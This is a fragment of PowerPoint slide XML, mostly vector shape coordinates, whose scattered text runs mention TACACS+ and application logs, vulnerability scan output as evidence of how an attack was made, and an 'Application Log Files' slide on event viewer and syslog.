              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-2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45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>TACACS+ </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-56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404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="2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0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>logs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23516" y="7591043"/>
            <a:ext cx="13075919" cy="984885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="13075919" h="984884">
                <a:moveTo>
                  <a:pt x="12911836" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="164083" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="820407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="864030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="903229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="936440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="962099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="978642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164083" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12911836" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12955475" y="978642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12994677" y="962099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13027882" y="936440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13053530" y="903229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13070062" y="864030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13075920" y="820407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13075920" y="164083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13070062" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13053530" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13027882" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12994677" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12955475" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12911836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158489" y="7888630"/>
            <a:ext cx="112776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8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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>scan</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>output</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-19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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>helps</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>determining</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>how</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-18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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>might</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>been</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>made.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99708" y="306451"/>
            <a:ext cx="36556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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Log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30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Files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36691" y="760476"/>
            <a:ext cx="5254752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046857" y="1882292"/>
            <a:ext cx="11076305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33500" marR="5080" indent="-1321435">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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An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application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35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>OS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which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manages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application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log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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>might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use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event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viewer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syslog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log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various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event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data.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Various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application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log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files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are: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507735" y="3692652"/>
            <a:ext cx="5241290" cy="4006850"/>
            <a:chOff x="5507735" y="3692652"/>
            <a:chExt cx="5241290" cy="4006850"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6402323" y="3892804"/>
              <a:ext cx="3499485" cy="3492500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3499484" h="3492500">
                  <a:moveTo>
                    <a:pt x="1987188" y="3479800"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1511915" y="3479800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1558725" y="3492500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1940378" y="3492500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1987188" y="3479800"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3499484" h="3492500">
                  <a:moveTo>
                    <a:pt x="2170349" y="3441700"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1328754" y="3441700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465496" y="3479800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2033607" y="3479800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2170349" y="3441700"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3499484" h="3492500">
                  <a:moveTo>
                    <a:pt x="2079618" y="25400"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1419485" y="25400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1373899" y="38100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1110228" y="114300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1068079" y="139700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1026488" y="152400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="985470" y="177800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="945043" y="190500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905223" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="866027" y="241300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="827471" y="254000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="789571" y="279400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="752346" y="304800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715810" y="330200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679981" y="368300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="644875" y="393700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610509" y="419100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576900" y="444500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544063" y="482600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512016" y="508000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480775" y="546100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="450357" y="571500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420778" y="609600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392055" y="647700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364204" y="673100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337242" y="711200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311186" y="749300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286053" y="787400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261858" y="825500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238618" y="863600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216351" y="901700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195072" y="939800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174798" y="977900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155546" y="1028700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137332" y="1066800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120173" y="1104900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104086" y="1155700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89086" y="1193800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75192" y="1244600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62418" y="1282700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50783" y="1333500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40301" y="1371600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30991" y="1422400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22868" y="1460500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15950" y="1511300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10252" y="1562100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5791" y="1600200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2585" y="1651000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="649" y="1701800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1752600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="649" y="1790700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2585" y="1841500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5791" y="1892300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10252" y="1943100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15950" y="1981200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22868" y="2032000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30991" y="2082800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40301" y="2120900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50783" y="2171700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62418" y="2209800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75192" y="2260600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89086" y="2298700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104086" y="2349500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120173" y="2387600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137332" y="2425700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155546" y="2476500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174798" y="2514600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195072" y="2552700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216351" y="2590800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238618" y="2628900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261858" y="2667000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286053" y="2705100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311186" y="2743200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337242" y="2781300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364204" y="2819400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392055" y="2857500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420778" y="2882900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="450357" y="2921000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480775" y="2959100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512016" y="2984500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544063" y="3022600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576900" y="3048000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610509" y="3073400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="644875" y="3111500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679981" y="3136900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715810" y="3162300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="752346" y="3187700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="789571" y="3213100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="827471" y="3238500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="866027" y="3263900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905223" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="985470" y="3327400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1026488" y="3340100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1068079" y="3365500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1196132" y="3403600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1239854" y="3429000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1284067" y="3441700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2215036" y="3441700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2259249" y="3429000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2302971" y="3403600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2431024" y="3365500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2472615" y="3340100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2513633" y="3327400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2573970" y="3289300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1654148" y="3289300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1607011" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1560278" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1513971" y="3263900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1468111" y="3263900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1246269" y="3200400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1161412" y="3175000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1119899" y="3149600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1079027" y="3136900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1038815" y="3111500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="999286" y="3086100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="960460" y="3073400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="922360" y="3048000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885006" y="3022600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="848420" y="2997200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="812623" y="2971800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777637" y="2946400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743482" y="2908300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710181" y="2882900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677754" y="2857500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646224" y="2819400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="615611" y="2794000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585937" y="2755900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557223" y="2717800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529490" y="2679700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502760" y="2654300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477055" y="2616200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452395" y="2578100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428802" y="2540000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406298" y="2501900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384903" y="2463800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364639" y="2425700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345528" y="2374900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327590" y="2336800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310848" y="2298700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295323" y="2247900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281035" y="2209800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268007" y="2159000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256259" y="2120900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245813" y="2070100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236691" y="2032000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228914" y="1981200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222503" y="1943100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217479" y="1892300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213864" y="1841500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211679" y="1790700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210947" y="1752600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211679" y="1701800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213864" y="1651000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217479" y="1600200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222503" y="1562100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228914" y="1511300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236691" y="1473200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245813" y="1422400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256259" y="1371600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268007" y="1333500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281035" y="1282700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295323" y="1244600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310848" y="1206500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327590" y="1155700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345528" y="1117600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364639" y="1079500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384903" y="1041400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406298" y="1003300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428802" y="965200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452395" y="927100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477055" y="889000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502760" y="850900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529490" y="812800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557223" y="774700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585937" y="736600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="615611" y="711200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646224" y="673100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677754" y="647700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710181" y="609600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743482" y="584200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777637" y="558800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="812623" y="533400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="848420" y="495300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885006" y="469900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="922360" y="444500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="960460" y="431800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="999286" y="406400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1038815" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1079027" y="368300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1119899" y="342900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1161412" y="330200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1203542" y="304800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1422720" y="241300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1468111" y="241300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1560278" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1701669" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1749552" y="203200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2573970" y="203200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2554060" y="190500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2513633" y="177800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2472615" y="152400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2431024" y="139700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2388875" y="114300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2125204" y="38100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2079618" y="25400"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3499484" h="3492500">
                  <a:moveTo>
                    <a:pt x="2573970" y="203200"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1749552" y="203200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1797434" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1938825" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2030992" y="241300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2076383" y="241300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2295561" y="304800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2337691" y="330200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2379204" y="342900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420076" y="368300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2460288" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2499817" y="406400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2538643" y="431800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2576743" y="444500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2614097" y="469900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2650683" y="495300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2686480" y="533400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2721466" y="558800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2755621" y="584200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2788922" y="609600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2821349" y="647700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2852879" y="673100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2883492" y="711200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2913166" y="736600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2941880" y="774700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2969613" y="812800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2996343" y="850900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3022048" y="889000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3046708" y="927100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3070301" y="965200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3092805" y="1003300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3114200" y="1041400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134464" y="1079500"/>
